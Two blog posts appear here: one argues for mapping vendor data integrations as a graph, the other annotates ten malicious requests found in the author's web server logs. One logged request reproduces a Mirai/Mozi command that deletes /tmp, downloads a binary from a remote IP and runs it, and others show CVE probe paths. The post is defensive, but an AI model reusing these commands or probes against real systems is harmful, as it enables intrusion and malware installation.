Map Your Data Integrations, Or You Don’t Understand Your Risk

It’s 3am. Do you know, exactly, where your data is?

Which vendors receive or touch your data?

What type of data each vendor is involved with?

Startups and software move fast.  Pretty soon the SaaS and vendor integrations pile up.  Security and Privacy implications are real but invisible, versus the actual connections over which your company’s data is flowing.

Thesis: you need to maintain a living map of your SaaS and vendor integrations, otherwise you don’t actually understand your data tenancy or security.

Ask yourself, at your company do you know who owns the list of all vendors and data flows?  “I think someone knows…”  “We could pull that together…”  “It exists somewhere…”  You’re already behind.

If you’re in a regulated industry or in a high expectations contractual space with customers, not having this data integration map is a risky way to operate.

  • Security
    • Data movements
    • Blast radius
  • Privacy and Data Governance
    • Where is PII/PHI flowing?
    • Subprocessors (approval and reviews)
    • Data retention + deletion obligations
  • Compliance & Customer Trust
    • SOC2, HITRUST, HIPAA, PCI, etc.
    • Enterprise security questionnaire: “List all your subprocessors”

Without the data integrations map, you’re running a structural risk not just an operational inconvenience.

Data Integrations Graph (DIG)

Yes, ‘graph‘ as in the discrete mathematical sense.  A visualization with nodes and edges. An xlsx, google-sheet, or table simply isn’t going to cut it.

  • Nodes: your systems, vendors, SaaS tools, data partners
  • Edges: direct connections and data flows between Nodes

And a clarification: Data Flows vs. Data Integrations (and why this matters). The DIG can extend the idea of a formal Data Flow Diagram (DFD) beyond your own systems and services, to include every external system your data might touch. This is where most companies lose visibility.

Codify

As mentioned above, a spreadsheet can’t convey the graph.  Instead use a lightweight syntax like Mermaid, graphviz, or D2.  (There are many many many online renderers for graphviz.  And if you have a high security environment, you’ll want to download and run graphviz within your network to mitigate the chance of publicly leaking the graph.)  See basic and complex examples in graphviz syntax.  (Generated pics below.)

The graph may become complex visually. Rather it’s the code/syntax definition which is meant to be referenced (i.e. control-F for all mentions of a node) and not for the sole purpose of visualization generation. (But visualizations _are_ fun.)

Living Document

This is not just a “generate once” and now we’re done.  Put the graph under source control, assign an owner, and involve processes and teams to ensure it stays up to date.

  • Reviews: annual or quarterly for network or inventory
  • Incident Response: understand blast radius quickly
  • Shadow IT discovery: cross-check against other inventories or reality
  • Vendor / SaaS acquisitions, reviews, and offboarding
  • Threat Modeling
  • Data Flows: use the graph to inform the flow diagram

CTA

Start small (pick 5-10 systems), map the integrations, put it in source control, and integrate into regular company processes.

You don’t need a perfect graph. You need a living one.

The companies that win on trust aren’t the ones with the most policies — they’re the ones that actually understand their systems.

10 Malicious Requests Against My Web Application

During a recent coding experiment/competition I had a (very rough) NodeJS app which I needed to deploy and host. Horror of horrors, I manually installed it onto a bare EC2 and pointed an Elastic-IP. Using pm2 (process manager) I was up and running very quickly, and writing request logs locally.

PORT=8080 pm2 start bin/www --time --output ~/log.txt

What’s nice about running on IaaS (vs. PaaS) is there’s a lot more control and insights. Specifically the log.txt named above. I could see the legitimate requests and traffic hitting my app from my colleague coders, but there were a lot of other requests causing my application to return 404 Not Found. I was curious and started duckduckgo‘ing and discovered a lot of them were attempted web exploits hoping my server was vulnerable.

Below are ten malicious requests narrated with some of my cursory research.

I don’t claim deep expertise in any of these attacks or technologies. (Please note my non-authoritative tone where I’ve written “I believe”.) Cybersecurity is a very deep field, and if I was architecting a truly critical system there are many tools or appliances which can recognize and block such threats or malicious requests instead of my naively exposed EC2 instance. While it was entertaining to do the research below, I could have spent days looking deeper and learning about the history of each vulnerability or exploit.

Bonus: I have this list hosted in a public github repository, and I would welcome any pull requests to help correct, inform, or expand on anything below.

1) PHP and MySQL

2021-04-25T10:19:17: GET /mysql/index.php?lang=en 404 0.940 ms - 1103

PHP is a very common framework in the web development community, and there are many sites describing how it can integrate with mySQL. ‘Index’ here with the php extension implies some code process and not simply fetching a static resource (such as an HTML file). Since this is under the mysql resource, it appears to be a big sniff to see if a console to the mysql db has been left open.

2) Mirai malware, bashdoor and arbitrary code execution

2021-04-25T10:21:27: GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.36.40.208:44947/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.964 ms - 1103

Immediately one can recognize the shell resource, that this is a flavor of a bashdoor attack or attempting to insert and invoke arbitrary code at the command line level. It first tries to clear out everything in the ‘tmp’ direcotry (cd /tmp; rm -rf *) before fetching (wget) a remotely hosted file (‘Mozi.a`, part of the Mirai botnet) and then tries to invoke.

3) AWS Metadata (not malicious)

2021-04-25T11:17:53: GET http://169.254.169.254/latest/meta-data/ 404 1.033 ms - 1103

Not an attack, rather something particular to AWS EC2 instance metadata. I believe it’s the AWS SDK (within my NodeJS application) locally looking for the metadata containing the AWS credentials (since my web app was integrated with DynamoDB). Noteworthy is the IP 169.254.169.254 is special to every EC2 instance.

4) “The Moon” against Linksys Devices

2021-04-25T11:49:04: POST /HNAP1/ 404 0.837 ms - 1103

Home Network Administration Protocl (HNAP) is a Cisco proprietary protocol for managing network devices, going back to 2007. There was a worm, “The Moon”, back in 2014, which used the HNAP1 protocol to identify specific Linksys routers (firmware etc.), and then send a second request to invoke an exploit at the CGI/script level which downloads the worm’s script.

5) Sniffing for Environment Variables

2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103

The .env file is not specific to one framework or language, but actually closer to industry convention. I think this request is hoping that the server is simply hosting a directory and that an .env might be exposed possibly revealing things like API keys or credential keys/tokens.

6) “Hey, look at my ads!!!”

2021-04-25T17:00:00: POST http://likeapro.best/

I tried the URl, and it was a ‘Not Found’, so maybe it was shut down or abandoned. Maybe someone is hoping to get more traffic to a site laden with ads. More nuisance than malice.

7) WiFi Cameras Leaking admin Passwords

2021-04-25T18:04:09: GET /config/getuser?index=0 404 0.940 ms - 1103

Specific D-Link WI-fi cameras had a vulnerability where the remote administrator password could be directly queried without authentication! Hoorah for the National Vulnerability Database (NIST), the page for this vulnerability in particular was fun to read through and click the links deeper into the vulnerability and who/how it was uncovered.

8) PHP Unit Test Framework Weakening Prod

2021-04-25T20:12:45: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.083 ms - 1103

This is a vulnerability for specific version of PHPUnit, where arbitrary PHP code could be executed! (Good example why modules specific to testing should be disabled or omitted in production deployments.) Here’s a very detailed story (by a PHP expert), on how this impacted a retail website. The first link is to cve.mitre.org, a vulnerability catalog sponsored by USA’s DHS and CISA, and the actual site is maintained by the MITRE Corp.

9) JSON Deserialization Vulnerability

2021-04-25T20:12:45: POST /api/jsonws/invoke 404 0.656 ms - 1103

Liferay is a digital portal/platform product, which had a JSON (deserialization) and remote code execution vulnerability (CVE-2020-7961) in March of 2020 and documented by Code White. Bonus, here’s the scanner (github) of a scanner someone created for this vulnerability.

10) Apache Solr Exposing Files

2021-04-25T20:12:45: GET /solr/admin/info/system?wt=json 404 0.989 ms - 1103

Ranked as the #7 Web Service Exploit of 2020, even though Apache published an issue back in 2013! The above request is a scan looking for specific versions of Apache Solr (search platform), where a particular parameter is exposed and can lead to arbitrary file reading. Apparently this is combined with some other vulnerabilities to eventually get to remote code execution, detailed in CVE-2013-6397.